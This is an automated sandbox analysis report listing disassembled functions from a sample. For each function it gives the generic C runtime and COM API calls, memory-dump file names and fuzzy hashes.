Opcode Fuzzy Hash: 1e098109b1fc8944f34012f8cbb4915184b878268acd70d5046bcf0b40e69a37
Instruction Fuzzy Hash: D541A93A6082019FC700DF69C840B5AB7F9FF8A724F148A6DF9449B750D731E902CBA2

Function 6CEB5DB0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

std::exception::exception.LIBCMT ref: 6CEB5E87
__CxxThrowException@8.LIBCMT ref: 6CEB5E9C
std::exception::exception.LIBCMT ref: 6CEB5EAB
__CxxThrowException@8.LIBCMT ref: 6CEB5EC0

Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: cf71a8516cff2292f9308ff2edf5c6fe7dd1995a74770ec74c7f53de38e9b49f
Instruction ID: edaa0c631cebb7f7063e89909555228a8d81fade28b1ddb33cb9460c41cff153
Opcode Fuzzy Hash: cf71a8516cff2292f9308ff2edf5c6fe7dd1995a74770ec74c7f53de38e9b49f
Instruction Fuzzy Hash: F4416EB19057489FC720CFA8C980A9AFBF4FF08304F50896EE49A97B41D775E508CBA1

Function 6CEAD360 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

std::exception::exception.LIBCMT ref: 6CEAD437
__CxxThrowException@8.LIBCMT ref: 6CEAD44C
std::exception::exception.LIBCMT ref: 6CEAD45B
__CxxThrowException@8.LIBCMT ref: 6CEAD470

Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: 273923469ae3c4bf380e7ebe040e800dce97fbf7a28094982833a40ddfc612dc
Instruction ID: 3b724c67251ff264dcfa311da739604251d2f180f49bebc384acefd6c7e4c5cb
Opcode Fuzzy Hash: 273923469ae3c4bf380e7ebe040e800dce97fbf7a28094982833a40ddfc612dc
Instruction Fuzzy Hash: 78413CB19047489FC720CFA9D480A9AFBF4FF09304F50896ED89A97B41D775E608CBA1

Function 6CEF2B80 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

Part of subcall function 6CEC6480: __CxxThrowException@8.LIBCMT ref: 6CEC6518
Part of subcall function 6CEC6480: __CxxThrowException@8.LIBCMT ref: 6CEC6558

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

std::exception::exception.LIBCMT ref: 6CEF2C9A
__CxxThrowException@8.LIBCMT ref: 6CEF2CB1
std::exception::exception.LIBCMT ref: 6CEF2CC3
__CxxThrowException@8.LIBCMT ref: 6CEF2CDA

Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$_malloc
String ID:
API String ID: 3942750879-0
Opcode ID: 35de25af2108bdbd410bf8b61ef1b6d66e82153273d94cd5c6a7959f22d49cd8
Instruction ID: 44fd28eb37f9eeec1cbdec1038bad7023acc329672f8e86a99b8e9ab6a17a7fc
Opcode Fuzzy Hash: 35de25af2108bdbd410bf8b61ef1b6d66e82153273d94cd5c6a7959f22d49cd8
Instruction Fuzzy Hash: 6C415BB15187419FC314CF58C480A9AFBF4FF99714F608A2EF1AA87B50D771A548CB92

Function 6CEBC410 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEBC478
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEBC488
SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6CEBC4B4
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBC512

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Bound$DestroyElement
String ID:
API String ID: 3987547017-0
Opcode ID: cdfe992e74b4527afbf878253890594098b903e2e81b054dbf3db491b4246a44
Instruction ID: f7f4a95e7397a6b9a73dd3bd27848d72c6634ddf17f9130fefec93bed0f34509
Opcode Fuzzy Hash: cdfe992e74b4527afbf878253890594098b903e2e81b054dbf3db491b4246a44
Instruction Fuzzy Hash: 9F413171B0414AAFDB00DF98C980EEEBBB9EB49354F208569F919E7740D730AA45CB60

Function 6CEBB580 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6CF102A0), ref: 6CEBB5D5
VariantInit.OLEAUT32(?), ref: 6CEBB5E2
VariantClear.OLEAUT32(?), ref: 6CEBB685
VariantClear.OLEAUT32(6CF102A0), ref: 6CEBB68B

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 4f57af6c56a3a553275d0dc5d3496e87c70d51de4cad66f5ccb2bcd37668f305
Instruction ID: 7541918490fd811671538bb352eca909e6bc60b4c611ea88540f9cb612a59857
Opcode Fuzzy Hash: 4f57af6c56a3a553275d0dc5d3496e87c70d51de4cad66f5ccb2bcd37668f305
Instruction Fuzzy Hash: 35419372A01209DFDB10DFA9C980B9AF7F9EF89314F2441A9E914A7750D776ED01CB90

Function 6CF088C9 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6CF088FD
__isleadbyte_l.LIBCMT ref: 6CF08930
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6CF08961
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6CF089CF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: b9b2100a4d84f71137f618b7d35c5130158eae5fbc39ca1b24c10a50e3c41146
Instruction ID: 775f71816f5675b8bcdc833149f53ebc72dec53879ec78f504915f515153e971
Opcode Fuzzy Hash: b9b2100a4d84f71137f618b7d35c5130158eae5fbc39ca1b24c10a50e3c41146
Instruction Fuzzy Hash: DE31F831B05386EFDB00DFA8C8A4AAE3FF4BF01B14F25456AE4A49B691D330D940EB51

Function 6CE95A30 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

std::exception::exception.LIBCMT ref: 6CE95ACB
__CxxThrowException@8.LIBCMT ref: 6CE95AE0
std::exception::exception.LIBCMT ref: 6CE95B18
__CxxThrowException@8.LIBCMT ref: 6CE95B2D

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$_malloc
String ID:
API String ID: 3153320871-0
Opcode ID: 4041dceba797dc1611699ef8aa9caa1d257bead603b3abc15b7226ad305d971e
Instruction ID: c5a0351d85180a620dca78bd32bbcb308971e6e953965bfcfa159ab99e3c890a
Opcode Fuzzy Hash: 4041dceba797dc1611699ef8aa9caa1d257bead603b3abc15b7226ad305d971e
Instruction Fuzzy Hash: 8131B8B2914608ABC710CF94D8419DAF7F8FF48754F10C66EE85997B40EB70AA04CBE1

Function 6CEA8470 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

InitializeCriticalSection.KERNEL32(00000000,00000000,6CEA5D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6CEA84EA
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6CEA84F0
std::exception::exception.LIBCMT ref: 6CEA853C
__CxxThrowException@8.LIBCMT ref: 6CEA8551

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: CriticalInitializeSection$Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 3005353045-0
Opcode ID: f4b66f260cbe70c22ee030345da939cb9c4acb86dec41f9def7457dbac4ec9e4
Instruction ID: 7e636236e09c4535d4d16f7bd62c4a03d3c6c47fdf8c785dde3ba1c4eb5abfd6
Opcode Fuzzy Hash: f4b66f260cbe70c22ee030345da939cb9c4acb86dec41f9def7457dbac4ec9e4
Instruction Fuzzy Hash: EE317C72A01744AFC714CFA8C480A9AFBF8FF08214F508A6EE85687B41D770FA44CB90

Function 6CEBDC40 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CEBDCC5

Part of subcall function 6CEF9533: std::exception::_Copy_str.LIBCMT ref: 6CEF954E

__CxxThrowException@8.LIBCMT ref: 6CEBDCDA

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

std::exception::exception.LIBCMT ref: 6CEBDD09
__CxxThrowException@8.LIBCMT ref: 6CEBDD1E

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 399550787-0
Opcode ID: 7748be59e3a16451bee9d2a5bcb08ed867ee7566871fb5a09d41d67ea0412c05
Instruction ID: 8c203918e7128e9d328c9344ed2c148edecebc0938002b1f94a85cee29c87178
Opcode Fuzzy Hash: 7748be59e3a16451bee9d2a5bcb08ed867ee7566871fb5a09d41d67ea0412c05
Instruction Fuzzy Hash: 26314FB69042099FD704CF99D841AAEBBF8FF48314F5085ADE91997750D770EA04CBA1

Function 6CF02645 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CF02653

Part of subcall function 6CEF9D66: __FF_MSGBANNER.LIBCMT ref: 6CEF9D7F
Part of subcall function 6CEF9D66: __NMSG_WRITE.LIBCMT ref: 6CEF9D86
Part of subcall function 6CEF9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CEF9BD4,6CE91290,67D4BDE6), ref: 6CEF9DAB

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: c612b35f7be9d7a28db27d500401de2c8dea69bf111ff574d0c6d96f98cdbfec
Instruction ID: dce23d27a28960c11fbb4e51727dc038c981a6e623a6814440c9391b497dcd7f
Opcode Fuzzy Hash: c612b35f7be9d7a28db27d500401de2c8dea69bf111ff574d0c6d96f98cdbfec
Instruction Fuzzy Hash: 15112B33B05214ABCF211F35A81878E3BB5AB42B79F35012DE4549BF80DB328941A7B4

Function 6CEA7240 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 6CEC4410: _malloc.LIBCMT ref: 6CEC446E

SafeArrayCreateVector.OLEAUT32(00000011,00000000,?), ref: 6CEA7287
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CEA729B
_memmove.LIBCMT ref: 6CEA72AF
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEA72B8

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccessVector_malloc_memmove
String ID:
API String ID: 583974297-0
Opcode ID: ffc99a42e02a79b885be3e88be26f767c287468f64c0b2bd0841ef5ff70e5b41
Instruction ID: a76a6d07861a349ffdecef26e1ab6bc332801231c1617fee1e085b8403038051
Opcode Fuzzy Hash: ffc99a42e02a79b885be3e88be26f767c287468f64c0b2bd0841ef5ff70e5b41
Instruction Fuzzy Hash: 9D1193B2A10118BBCB00CFD5D840DDFBB7DDFC9654B118269F904AB600D6709A0587E0

Function 6CEB5A70 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEB5AB9
VariantCopy.OLEAUT32(?,6CF29C90), ref: 6CEB5AC1
VariantClear.OLEAUT32(?), ref: 6CEB5AE2
__CxxThrowException@8.LIBCMT ref: 6CEB5AEF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ClearCopyException@8InitThrow
String ID:
API String ID: 3826472263-0
Opcode ID: 5ec465ce41d072ec79f99f24fe99df8d3059e0aca39df38eeab23a8d8b34c07a
Instruction ID: b56b6bd6e42568854e11bd94815a4a40d71788854fc7acc45e88cb3f33726a54
Opcode Fuzzy Hash: 5ec465ce41d072ec79f99f24fe99df8d3059e0aca39df38eeab23a8d8b34c07a
Instruction Fuzzy Hash: 9A11E972D05258AFCB11DF98C9C4AEFBB78EB46628F31422AE824B7B00C7745D0487E1

Function 6CEC8D80 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CEC8D8A

Part of subcall function 6CEF9D66: __FF_MSGBANNER.LIBCMT ref: 6CEF9D7F
Part of subcall function 6CEF9D66: __NMSG_WRITE.LIBCMT ref: 6CEF9D86
Part of subcall function 6CEF9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CEF9BD4,6CE91290,67D4BDE6), ref: 6CEF9DAB

Part of subcall function 6CEF91F6: std::_Lockit::_Lockit.LIBCPMT ref: 6CEF9202

_malloc.LIBCMT ref: 6CEC8DAF
std::exception::exception.LIBCMT ref: 6CEC8DD4
__CxxThrowException@8.LIBCMT ref: 6CEC8DEB

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
String ID:
API String ID: 3043633502-0
Opcode ID: 5c415089a3dec5c2ee182f0bc1953cb4c00f30a406642cfe562cc8d59709e529
Instruction ID: b1aa5a5bf409b84e87e0c36dd23403c963deeecc38eaf597215c3f1d06197df6
Opcode Fuzzy Hash: 5c415089a3dec5c2ee182f0bc1953cb4c00f30a406642cfe562cc8d59709e529
Instruction Fuzzy Hash: E5F0CD7290421127D310EF559E51BEF3ABC9F91618F60082DF8A492B00EB25960E86B3

Function 6CF00A60 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6CF00A86

